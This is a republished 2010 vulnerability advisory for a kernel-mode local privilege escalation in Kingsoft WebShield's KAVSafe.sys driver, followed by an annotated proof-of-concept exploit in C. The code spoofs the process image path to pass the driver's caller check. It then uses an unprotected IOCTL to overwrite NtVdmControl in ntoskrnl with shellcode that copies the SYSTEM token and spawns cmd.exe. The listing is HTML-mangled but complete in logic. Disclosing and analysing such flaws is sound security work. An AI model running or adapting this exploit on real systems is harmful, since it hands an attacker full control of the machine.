金山網盾爆出本地提權漏洞

來源:互聯網
上載者:User
Kingsoft WebShield KAVSafe.sys <=
2010.4.14.609(2010.5.23) Kernel Mode Local Privilege Escalation
Vulnerability
SSV ID: 19676
SEBUG-Appdir: 金山(Kingsoft)
發布時間: 2010-05-23
資訊提交: yicong2010

(yicong2010_at_yahoo.com)

影響版本:
Kingsoft WebShield <= 3.5.1.2 (2010.5.23)

Signature Date: 2010-5-23 2:33:54

And

KAVSafe.sys <= 2010.4.14.609
Signature Date:2010-4-14 13:42:26
漏洞描述:
KAVSafe.sys creates a device called \Device\KAVSafe and handles the DeviceIoControl request with IoControlCode = 0x830020d4, which can overwrite arbitrary kernel module data.
參考:

none

測試方法:

[www.sebug.net]

本站提供者(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!

 

/*
 * Proof-of-concept listing from the advisory above (Kingsoft WebShield /
 * KAVSafe.sys <= 2010.4.14.609). Kept exactly as published: the text is
 * HTML residue from the page extraction (<br /> and </p><p> stand for line
 * breaks, and string-literal escapes are mangled), so it is not a
 * compilable unit as shown. It is annotated here for defenders and driver
 * authors, not repaired.
 *
 * What the listing demonstrates (all visible in the code below):
 *  - The device \Device\KAVSafe is opened with only FILE_READ_ATTRIBUTES,
 *    and IOCTL_HOTPATCH_KERNEL_MODULE is defined with FILE_ANY_ACCESS, so
 *    the driver grants a kernel-memory-patching IOCTL to any caller that
 *    can open the device at all.
 *  - Before opening the device the PoC rewrites its own
 *    PEB->ProcessParameters->ImagePathName to the product's kavinst.exe
 *    path (read from HKLM\SOFTWARE\Kingsoft\KSWSVC, value ProgramPath)
 *    and restores it afterwards. This suggests the driver authorises
 *    callers by their image path, a value the caller controls
 *    (inferred from the PoC, not verified against the driver).
 *  - The IOCTL buffer names a kernel module ("ntoskrnl.exe"), an RVA
 *    (NtVdmControl, resolved by loading the kernel image in user mode)
 *    and replacement bytes taken from R0ShellCodeXP. That routine walks
 *    the process list until it finds PID 4 (System) and copies a field —
 *    presumably the access token — into the calling process, using
 *    XP-specific hard-coded offsets. Calling NtVdmControl from user mode
 *    then executes it, and the WinExec("cmd.exe") that follows runs with
 *    the elevated token.
 *
 * Defensive notes:
 *  - Root cause: an IOCTL that writes kernel memory is reachable without a
 *    privilege check. Device objects exposing such operations need a
 *    restrictive security descriptor and a caller check the caller cannot
 *    influence (the PEB image path is caller-writable, as shown here).
 *    The advisory lists the affected builds; update beyond them.
 *  - Detection: handle opens of \Device\KAVSafe or DeviceIoControl with
 *    code 0x830020d4 from processes other than the vendor's own; a
 *    low-privilege process spawning cmd.exe with a SYSTEM token; an IOCTL
 *    buffer carrying "ntoskrnl.exe" followed by executable bytes.
 *
 * Code-quality notes (left uncorrected on purpose): the return values of
 * NtQueryInformationProcess, NtQuerySystemInformation and malloc are not
 * checked; pOldBufferData and Data are never freed; pShellCode is unused;
 * ShellCodeSize assumes NopNop is laid out directly after R0ShellCodeXP,
 * which no compiler guarantees.
 */
#define IOCTL_HOTPATCH_KERNEL_MODULE CTL_CODE(0x8300 , 0x835 , METHOD_BUFFERED ,FILE_ANY_ACCESS)<br />typedef LONG (WINAPI *PNT_QUERY_INFORMATION_PROCESS)(<br /> HANDLE ProcessHandle,<br /> DWORD ProcessInformationClass,<br /> PVOID ProcessInformation,<br /> ULONG ProcessInformationLength,<br /> PULONG ReturnLength<br /> );<br />typedef struct _STRING {<br /> USHORT Length;<br /> USHORT MaximumLength;<br /> PCHAR Buffer;<br />} STRING;<br />typedef STRING *PSTRING;<br />typedef struct _RTL_DRIVE_LETTER_CURDIR {<br /> USHORT Flags;<br /> USHORT Length;<br /> ULONG TimeStamp;<br /> STRING DosPath;<br />} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;<br />typedef struct _UNICODE_STRING {<br /> USHORT Length;<br /> USHORT MaximumLength;<br /> PWSTR Buffer;<br />} UNICODE_STRING;<br />typedef UNICODE_STRING *PUNICODE_STRING;<br />typedef const UNICODE_STRING *PCUNICODE_STRING;<br />#define RTL_MAX_DRIVE_LETTERS 32<br />#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001<br />typedef struct _CURDIR {<br /> UNICODE_STRING DosPath;<br /> HANDLE Handle;<br />} CURDIR, *PCURDIR;<br />typedef struct _RTL_USER_PROCESS_PARAMETERS {<br /> ULONG MaximumLength;<br /> ULONG Length;</p><p> ULONG Flags;<br /> ULONG DebugFlags;</p><p> HANDLE ConsoleHandle;<br /> ULONG ConsoleFlags;<br /> HANDLE StandardInput;<br /> HANDLE StandardOutput;<br /> HANDLE StandardError;</p><p> CURDIR CurrentDirectory; // ProcessParameters<br /> UNICODE_STRING DllPath; // ProcessParameters<br /> UNICODE_STRING ImagePathName; // ProcessParameters<br /> UNICODE_STRING CommandLine; // ProcessParameters<br /> PVOID Environment; // NtAllocateVirtualMemory</p><p> ULONG StartingX;<br /> ULONG StartingY;<br /> ULONG CountX;<br /> ULONG CountY;<br /> ULONG CountCharsX;<br /> ULONG CountCharsY;<br /> ULONG FillAttribute;</p><p> ULONG WindowFlags;<br /> ULONG ShowWindowFlags;<br /> UNICODE_STRING WindowTitle; // ProcessParameters<br /> UNICODE_STRING DesktopInfo; // ProcessParameters<br /> UNICODE_STRING ShellInfo; // 
ProcessParameters<br /> UNICODE_STRING RuntimeData; // ProcessParameters<br /> RTL_DRIVE_LETTER_CURDIR CurrentDirectores[ RTL_MAX_DRIVE_LETTERS ];<br />} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;<br />typedef struct _PEB {<br /> BOOLEAN InheritedAddressSpace; // These four fields cannot change unless the<br /> BOOLEAN ReadImageFileExecOptions; //<br /> BOOLEAN BeingDebugged; //<br /> BOOLEAN SpareBool; //<br /> HANDLE Mutant; // INITIAL_PEB structure is also updated.</p><p> PVOID ImageBaseAddress;<br /> PVOID Ldr;<br /> struct _RTL_USER_PROCESS_PARAMETERS *ProcessParameters;<br />} PEB, *PPEB;<br />typedef LONG KPRIORITY;<br />typedef struct _PROCESS_BASIC_INFORMATION {<br /> LONG ExitStatus;<br /> PVOID PebBaseAddress;<br /> ULONG_PTR AffinityMask;<br /> KPRIORITY BasePriority;<br /> ULONG_PTR UniqueProcessId;<br /> ULONG_PTR InheritedFromUniqueProcessId;<br />} PROCESS_BASIC_INFORMATION,*PPROCESS_BASIC_INFORMATION;<br />typedef struct {<br /> ULONG Unknown1;<br /> ULONG Unknown2;<br /> PVOID Base;<br /> ULONG Size;<br /> ULONG Flags;<br /> USHORT Index;<br /> USHORT NameLength;<br /> USHORT LoadCount;<br /> USHORT PathLength;<br /> CHAR ImageName[256];<br />} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;<br />typedef struct {<br /> ULONG Count;<br /> SYSTEM_MODULE_INFORMATION_ENTRY Module[1];<br />} X_SYSTEM_MODULE_INFORMATION, *PX_SYSTEM_MODULE_INFORMATION;<br />typedef LONG (WINAPI *PNT_QUERY_SYSTEM_INFORMATION) (<br /> LONG SystemInformationClass,<br /> PVOID SystemInformation,<br /> ULONG SystemInformationLength,<br /> PULONG ReturnLength<br /> );<br />#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )<br />typedef LONG (WINAPI *PNT_VDM_CONTROL) (<br /> ULONG Service,<br /> PVOID ServiceData<br /> );<br />VOID __declspec(naked) R0ShellCodeXP()<br />{<br />__asm<br />{<br />mov eax,0xffdff124<br />mov eax,[eax]<br />mov esi ,dword ptr[eax+0x220]<br />mov eax,esi<br />searchxp:<br />mov eax,dword ptr[eax+0x88]<br />sub 
eax,0x88<br />mov edx,dword ptr[eax+0x84]<br />cmp edx,4<br />jnz searchxp<br />mov eax,dword ptr[eax+0xc8]<br />mov dword ptr[esi + 0xc8] , eax<br />ret 8<br />}<br />}<br />VOID NopNop()<br />{<br />printf("nop!/n");<br />}<br />#include "malloc.h"<br />int main(int argc, char* argv[])<br />{<br />printf("KSWebShield KAVSafe.sys <= 2010,04,14,609/n"<br />"Kernel Mode Privilege Escalation Vulnerability Proof-of-Concept/n"<br />"2010-5-23/n"<br />"By Lincoin /n/nPress Enter");<br />HKEY hkey ;<br />WCHAR InstallPath[MAX_PATH];<br />DWORD datatype ;<br />DWORD datasize = MAX_PATH * sizeof(WCHAR);<br />ULONG oldlen ;<br />PVOID pOldBufferData = NULL ;<br />if (RegOpenKey(HKEY_LOCAL_MACHINE , "SOFTWARE//Kingsoft//KSWSVC", &hkey) == ERROR_SUCCESS)<br />{<br />if (RegQueryValueExW(hkey , L"ProgramPath" , NULL , &datatype , (LPBYTE)InstallPath , &datasize) != ERROR_SUCCESS)<br />{<br />RegCloseKey(hkey);<br />printf("KSWebShield not installed/n");<br />getchar();<br />return 0 ;<br />}<br />RegCloseKey(hkey);<br />}<br />else<br />{<br />printf("KSWebShield not installed/n");<br />getchar();<br />return 0 ;<br />}<br />wcscat(InstallPath , L"//kavinst.exe");</p><p>PROCESS_BASIC_INFORMATION pbi ;<br />PNT_QUERY_INFORMATION_PROCESS pNtQueryInformationProcess ;</p><p>pNtQueryInformationProcess = (PNT_QUERY_INFORMATION_PROCESS)GetProcAddress(GetModuleHandle("ntdll.dll" ) , "NtQueryInformationProcess");</p><p>pNtQueryInformationProcess(NtCurrentProcess() , 0 , &pbi , sizeof(pbi) , NULL);<br />PPEB peb ;<br />peb = (PPEB)pbi.PebBaseAddress;<br />oldlen = peb->ProcessParameters->ImagePathName.Length;<br />peb->ProcessParameters->ImagePathName.Length = wcslen(InstallPath) * sizeof(WCHAR);<br />pOldBufferData = malloc(peb->ProcessParameters->ImagePathName.Length);<br />RtlCopyMemory(pOldBufferData,peb->ProcessParameters->ImagePathName.Buffer , peb->ProcessParameters->ImagePathName.Length);<br />RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , InstallPath 
,peb->ProcessParameters->ImagePathName.Length );<br />HANDLE hdev = CreateFile("////.//KAVSafe" ,<br />FILE_READ_ATTRIBUTES ,<br />FILE_SHARE_READ ,<br />0,<br />OPEN_EXISTING ,<br />0,<br />0);<br />if (hdev==INVALID_HANDLE_VALUE)<br />{<br />printf("cannot open device %u/n", GetLastError());<br />getchar();<br />return 0 ;<br />}<br />RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , pOldBufferData,peb->ProcessParameters->ImagePathName.Length);<br />peb->ProcessParameters->ImagePathName.Length = (USHORT)oldlen ; </p><p>PNT_QUERY_SYSTEM_INFORMATION pNtQuerySystemInformation ;<br />pNtQuerySystemInformation = (PNT_QUERY_SYSTEM_INFORMATION)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtQuerySystemInformation");<br />X_SYSTEM_MODULE_INFORMATION sysmod ;<br />HMODULE KernelHandle ;<br />pNtQuerySystemInformation(0xb, &sysmod, sizeof(sysmod), NULL);</p><p> KernelHandle = LoadLibrary(strrchr(sysmod.Module[0].ImageName, '//') + 1);</p><p>if (KernelHandle == 0 )<br />{<br />printf("cannot load ntoskrnl!/n");<br />getchar();<br />return 0 ;<br />}<br />PVOID pNtVdmControl = GetProcAddress(KernelHandle , "NtVdmControl");<br />if (pNtVdmControl == 0 )<br />{<br />printf("cannot find NtVdmControl!/n");<br />getchar();<br />return 0 ;<br />}<br />pNtVdmControl = (PVOID)((ULONG)pNtVdmControl - (ULONG)KernelHandle );<br />printf("NtVdmControl = %08x" , pNtVdmControl );</p><p>getchar();<br />ULONG ShellCodeSize = (ULONG)NopNop - (ULONG)R0ShellCodeXP;<br />ULONG pShellCode = (ULONG)R0ShellCodeXP; </p><p>PVOID Data = malloc(0x48 + ShellCodeSize);<br />CopyMemory((PVOID)((ULONG)Data + 0x48) , R0ShellCodeXP , ShellCodeSize);</p><p>CHAR ModuleName[68]= "ntoskrnl.exe" ;<br />RtlCopyMemory( Data , ModuleName , sizeof(ModuleName));<br />*(ULONG*)((ULONG)Data + 64) = (ULONG)pNtVdmControl;<br />*(ULONG*)((ULONG)Data + 68) = ShellCodeSize ;</p><p>ULONG btr ;<br />if (!DeviceIoControl(hdev ,<br />IOCTL_HOTPATCH_KERNEL_MODULE ,<br />Data ,<br />0x48 + ShellCodeSize ,<br />NULL 
,<br />0,<br />&btr , 0<br />))<br />{<br />printf("cannot device io control!%u/n" , GetLastError());<br />getchar();<br />return 0;<br />}<br />CloseHandle(hdev);<br />PNT_VDM_CONTROL pR3NtVdmControl = (PNT_VDM_CONTROL)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtVdmControl");<br />pR3NtVdmControl(0,0);</p><p>WinExec("cmd.exe" , SW_SHOW);<br />printf("OK!/n ");<br />getchar();<br />return 0;<br />}<br />

 

原文地址:http://sebug.net/vulndb/19676/
